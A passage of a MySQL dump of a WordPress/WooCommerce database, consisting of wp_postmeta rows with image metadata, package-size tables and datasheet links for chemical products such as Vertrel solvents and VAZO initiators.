10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"vertrel-sdg-e1473257632273-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14117, 1272, '_wp_attached_file', '2016/09/heloxy-505.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14119, 1268, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14120, 1268, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14121, 1263, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (14122, 1268, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (14123, 1273, '_wp_attached_file', '2016/09/vertrel-sdg-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14124, 1273, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5024;s:6:"height";i:3744;s:4:"file";s:25:"2016/09/vertrel-sdg-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"vertrel-sdg-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"vertrel-sdg-2-800x596.jpg";s:5:"width";i:800;s:6:"height";i:596;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"vertrel-sdg-2-768x572.jpg";s:5:"width";i:768;s:6:"height";i:572;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"vertrel-sdg-2-1600x1192.jpg";s:5:"width";i:1600;s:6:"height";i:1192;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"vertrel-sdg-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"vertrel-sdg-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"vertrel-sdg-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"vertrel-sdg-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14125, 1271, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:3664;s:6:"height";i:2526;s:4:"file";s:15:"vertrel-sdg.jpg";}s:11:"medium-orig";a:4:{s:4:"file";s:23:"vertrel-sdg-800x552.jpg";s:5:"width";i:800;s:6:"height";i:552;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:23:"vertrel-sdg-768x529.jpg";s:5:"width";i:768;s:6:"height";i:529;s:9:"mime-type";s:10:"image/jpeg";}s:10:"large-orig";a:4:{s:4:"file";s:25:"vertrel-sdg-1600x1103.jpg";s:5:"width";i:1600;s:6:"height";i:1103;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:23:"vertrel-sdg-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:23:"vertrel-sdg-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:23:"vertrel-sdg-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (14127, 1275, '_wp_attached_file', '2016/09/vertrel-sdg-3.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14128, 1275, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:7328;s:6:"height";i:5052;s:4:"file";s:25:"2016/09/vertrel-sdg-3.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"vertrel-sdg-3-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"vertrel-sdg-3-800x552.jpg";s:5:"width";i:800;s:6:"height";i:552;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"vertrel-sdg-3-768x529.jpg";s:5:"width";i:768;s:6:"height";i:529;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"vertrel-sdg-3-1600x1103.jpg";s:5:"width";i:1600;s:6:"height";i:1103;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"vertrel-sdg-3-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"vertrel-sdg-3-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"vertrel-sdg-3-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"vertrel-sdg-3-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14129, 1268, '_thumbnail_id', '1275'); 
INSERT INTO `wp_postmeta` VALUES (14130, 1270, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14131, 1270, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14132, 1270, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14133, 1270, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14134, 1270, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14135, 1270, '318_custom_list_file', 'a:2:{s:32:"36c367353552d2c7b62dbf6f2d6274e4";a:3:{s:4:"name";s:10:"HELOXY 505";s:4:"file";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/heloxy-505.pdf";s:4:"desc";s:14:"HELOXY 505 TDS";}s:32:"c78e106104e2bb32291acf067cc01211";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/heloxy-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (14136, 1270, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (14137, 1270, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14138, 1270, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14139, 1270, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14140, 1270, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14141, 1270, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14142, 1270, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14143, 1270, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14144, 1270, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14145, 1270, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14146, 1270, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14147, 1270, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14148, 1270, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14149, 1270, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14150, 1270, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14151, 1270, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14152, 1270, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14153, 1270, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14154, 1270, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14155, 1270, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14156, 1270, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14157, 1270, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14158, 1270, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14159, 1270, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14160, 1270, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (14161, 1270, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14162, 1270, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14163, 1270, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14164, 1270, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14165, 1270, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (14166, 1276, '_edit_lock', '1476114966:2'); 
INSERT INTO `wp_postmeta` VALUES (14167, 1276, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14168, 1276, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14169, 1276, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14170, 1276, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14171, 1276, '716_default_editor', '<ul>\r\n 	<li>Defluxing</li>\r\n 	<li>Medium and Heavy Soil Removal</li>\r\n 	<li>Light Soil Removal</li>\r\n 	<li>Precision Cleaning</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14172, 1276, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14173, 1276, '318_custom_list_file', 'a:1:{s:32:"7c000af3c4fcd488dd531f9e92a22edf";a:3:{s:4:"name";s:15:"Vertrel SFR PDF";s:4:"file";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/SFR-EC.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (14174, 1276, '317_default_editor', '<table width="689">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="224"><strong>Glass</strong></td>\r\n<td style="text-align: center;" width="263"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">8 oz.</td>\r\n<td style="text-align: center;">Quart.</td>\r\n<td style="text-align: center;">5 Gallons</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">12 oz.</td>\r\n<td style="text-align: center;">1 Gallon</td>\r\n<td style="text-align: center;">55 Gallons</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14175, 1276, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14176, 1276, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14177, 1276, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14178, 1276, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14179, 1276, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14180, 1276, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14181, 1276, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14182, 1276, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14183, 1276, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14184, 1276, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14185, 1276, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14186, 1276, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14187, 1276, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14188, 1276, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14189, 1276, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14190, 1276, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14191, 1276, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14192, 1276, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14193, 1276, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14194, 1276, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14195, 1276, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14196, 1276, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (14197, 1276, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14198, 1276, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14199, 1276, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14200, 1276, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14201, 1276, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (14229, 1277, '_wp_attached_file', '2016/09/vertrel-sfr.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14230, 1277, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:23:"2016/09/vertrel-sfr.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"vertrel-sfr-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"vertrel-sfr-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"vertrel-sfr-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"vertrel-sfr-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"vertrel-sfr-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"vertrel-sfr-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"vertrel-sfr-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"vertrel-sfr-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14231, 1276, '_thumbnail_id', '1277'); 
INSERT INTO `wp_postmeta` VALUES (14232, 1276, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14233, 1276, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14234, 1278, '_edit_lock', '1476378272:2'); 
INSERT INTO `wp_postmeta` VALUES (14235, 1278, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14236, 1278, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14237, 1278, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14238, 1278, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14239, 1278, '716_default_editor', '<ul>\r\n 	<li>Carrier Fluid/Lubricant</li>\r\n 	<li>Deposition Drying/Rinsing Agent</li>\r\n 	<li>Heat Transfer Fluid</li>\r\n 	<li>High-Voltage Dielectrics</li>\r\n 	<li>Optics Cleaning</li>\r\n 	<li>Particulate/Ionic Removal</li>\r\n 	<li>Precision Cleaning</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14240, 1278, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14241, 1278, '318_custom_list_file', 'a:2:{s:32:"86e26851192bb208a93f4500b328a004";a:3:{s:4:"name";s:18:"Vertrel Data Sheet";s:4:"file";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-780-782.pdf";s:4:"desc";s:20:"Technical Data Sheet";}s:32:"004ee19a1a7bb833b7a1e41f49106593";a:3:{s:4:"name";s:14:"Vertrel XF PDF";s:4:"file";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/Vertrel-XF-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (14242, 1278, '317_default_editor', '<table width="689">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="224"><strong>Glass</strong></td>\r\n<td style="text-align: center;" width="263"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">8 oz.</td>\r\n<td style="text-align: center;">Quart.</td>\r\n<td style="text-align: center;">5 Gallons</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">12 oz.</td>\r\n<td style="text-align: center;">1 Gallon</td>\r\n<td style="text-align: center;">55 Gallons</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14243, 1278, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14244, 1278, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14245, 1278, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14246, 1278, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14247, 1278, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14248, 1278, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14249, 1278, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14250, 1278, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14251, 1278, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14252, 1278, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14253, 1278, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14254, 1278, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14255, 1278, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14256, 1278, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14257, 1278, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14258, 1278, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14259, 1278, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14260, 1278, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14261, 1278, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14262, 1278, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14263, 1278, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14264, 1278, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (14265, 1278, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14266, 1278, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14267, 1278, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14268, 1278, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14269, 1278, '_product_image_gallery', '1822'); 
INSERT INTO `wp_postmeta` VALUES (14297, 1279, '_wp_attached_file', '2016/08/VAZO-64-AIBN.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14298, 1279, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1585;s:4:"file";s:24:"2016/08/VAZO-64-AIBN.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"VAZO-64-AIBN-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"VAZO-64-AIBN-800x423.jpg";s:5:"width";i:800;s:6:"height";i:423;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"VAZO-64-AIBN-768x406.jpg";s:5:"width";i:768;s:6:"height";i:406;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"VAZO-64-AIBN-1600x845.jpg";s:5:"width";i:1600;s:6:"height";i:845;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"VAZO-64-AIBN-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"VAZO-64-AIBN-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"VAZO-64-AIBN-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"VAZO-64-AIBN-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14299, 427, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14300, 427, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14301, 1280, '_wp_attached_file', '2016/08/VAZO-67-composites.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14302, 1280, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5364;s:6:"height";i:3581;s:4:"file";s:30:"2016/08/VAZO-67-composites.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"VAZO-67-composites-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"VAZO-67-composites-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"VAZO-67-composites-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"VAZO-67-composites-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"VAZO-67-composites-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"VAZO-67-composites-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"VAZO-67-composites-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"VAZO-67-composites-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14303, 1281, '_wp_attached_file', '2016/09/vertrel-xf.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14304, 1281, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4288;s:6:"height";i:2848;s:4:"file";s:22:"2016/09/vertrel-xf.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"vertrel-xf-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"vertrel-xf-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"vertrel-xf-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"vertrel-xf-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"vertrel-xf-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"vertrel-xf-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"vertrel-xf-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"vertrel-xf-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1